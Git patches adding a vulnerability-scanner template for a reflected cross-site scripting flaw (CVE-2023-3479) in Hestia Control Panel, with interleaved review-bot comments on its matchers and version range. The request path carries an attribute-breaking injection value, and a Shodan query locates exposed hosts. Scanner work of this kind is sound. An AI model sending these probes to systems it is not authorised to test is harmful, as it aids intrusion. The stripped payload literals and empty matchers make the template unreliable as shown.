From 6dc7cbafe6e84135f0efffe4f4a16ba644f16b52 Mon Sep 17 00:00:00 2001
From: edoardottt
Date: Sun, 9 Jul 2023 11:02:02 +0200
Subject: [PATCH 1/3] add CVE-2023-3479
---
 http/cves/2023/CVE-2023-3479.yaml | 31 +++++++++++++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-3479.yaml
diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml
new file mode 100644
index 00000000000..9b4ba51f945
--- /dev/null
+++ b/http/cves/2023/CVE-2023-3479.yaml
@@ -0,0 +1,31 @@
+id: CVE-2023-3479
+
+info:
+ name: hestiacp/hestiacp prior to 1.7.8 - Cross-Site Scripting
+ author: edoardottt
+ severity: medium
+ description: |
+ Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.7.8.
+ reference:
+ - https://huntr.dev/bounties/6ac5cf87-6350-4645-8930-8f2876427723/
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-3479
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2023-3479
+ cwe-id: CWE-79
+ tags: cve,cve2023,hestiacp,xss
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}/templates/pages/debug_panel.php?id=xss">'
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code == 200'
+ - 'contains(content_type, "text/html")'
+ - 'contains(body, "")'
+ - 'contains(body, "Hestia Control Panel")'
+ condition: and
From 685850abaee5d2820a357b71bae6677b418568a7 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Mon, 10 Jul 2023 20:34:42 +0530
Subject: [PATCH 2/3] fix-matcher
---
 http/cves/2023/CVE-2023-3479.yaml | 25 +++++++++++++++++--------
 1 file changed, 17 insertions(+), 8 deletions(-)
diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml
index 9b4ba51f945..a6471866497 100644
--- a/http/cves/2023/CVE-2023-3479.yaml
+++ b/http/cves/2023/CVE-2023-3479.yaml
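Review bot: The new template's `info` block has no `remediation` field, so a finding tells the operator what was detected but not what to do about it, even though the description already gives the fixed boundary ("prior to 1.7.8"). Adding `remediation: Upgrade hestiacp to version 1.7.8 or later.` after `description` would make the result actionable without following the references. Separately, the payload literals in `path` and in `contains(body, "")` look truncated in this rendering; an empty-string body check would always be true, so it is worth confirming that the committed file carries the full reflected marker.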
@@ -1,7 +1,7 @@ id: CVE-2023-3479 info: - name: hestiacp/hestiacp prior to 1.7.8 - Cross-Site Scripting + name: Hestiacp <= 1.7.8 - Cross-Site Scripting author: edoardottt severity: medium description: | @@ -14,18 +14,27 @@ info: cvss-score: 6.1 cve-id: CVE-2023-3479 cwe-id: CWE-79 + cpe: cpe:2.3:a:hestiacp:control_panel:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + shodan-query: http.favicon.hash:-476299640 + verified: true tags: cve,cve2023,hestiacp,xss http: - method: GET path: - - '{{BaseURL}}/templates/pages/debug_panel.php?id=xss">' + - '{{BaseURL}}/templates/pages/debug_panel.php?id={{randstr}}">' + matchers-condition: and matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains(content_type, "text/html")' - - 'contains(body, "")' - - 'contains(body, "Hestia Control Panel")' + - type: word + part: body + words: + - 'debug-panel' + - '' condition: and + + - type: status + status: + - 200 From f942b15400e0291415958bb7b22a25f7d7a723da Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 10 Jul 2023 20:41:27 +0530 Subject: [PATCH 3/3] updated matcher --- http/cves/2023/CVE-2023-3479.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml index a6471866497..0703512cdac 100644 --- a/http/cves/2023/CVE-2023-3479.yaml +++ b/http/cves/2023/CVE-2023-3479.yaml @@ -17,8 +17,8 @@ info: cpe: cpe:2.3:a:hestiacp:control_panel:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.favicon.hash:-476299640 verified: true + shodan-query: http.favicon.hash:-476299640 tags: cve,cve2023,hestiacp,xss http: @@ -35,6 +35,11 @@ http: - '' condition: and + - type: word + part: header + words: + - text/html + - type: status status: - 200
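Review bot: The renamed title `Hestiacp <= 1.7.8` in the first hunk of PATCH 2/3 puts 1.7.8 inside the affected range, while the line it replaces and the template description both say "prior to 1.7.8", which reads as 1.7.8 being the fixed release. Unless 1.7.8 has been confirmed vulnerable, the line should be `name: Hestiacp < 1.7.8 - Cross-Site Scripting`, so that triage by title does not count patched hosts as in range. The `description` body lies outside this hunk, so the mismatch is only visible against the first patch.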
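Review bot: In the second hunk of PATCH 2/3 the request now carries `{{randstr}}` in the `id` parameter, but neither word of the new body matcher refers to it, so a match does not show that this request's own value was reflected. As rendered here the words are `'debug-panel'` and an empty string; the second looks stripped by the page, and if the committed word is a fixed tag it would also match a static page that happens to contain that tag. Consider adding `- '{{randstr}}'` to the same `condition: and` word list, or embedding the random value in the expected reflected string, to tie the response to the probe and cut false positives.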
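Review bot: The `word` matcher added in the second hunk of PATCH 3/3 looks for `text/html` anywhere in `part: header`, so it is not bound to Content-Type and is case-sensitive as written. The first patch's expression `contains(content_type, "text/html")` checked the one header that decides whether a browser renders the reflection as HTML. Restoring it as `- type: dsl` with `dsl:` and `- 'contains(content_type, "text/html")'` would keep that precision; at minimum add `case-insensitive: true` to the new matcher. The `matchers` list begins outside this hunk.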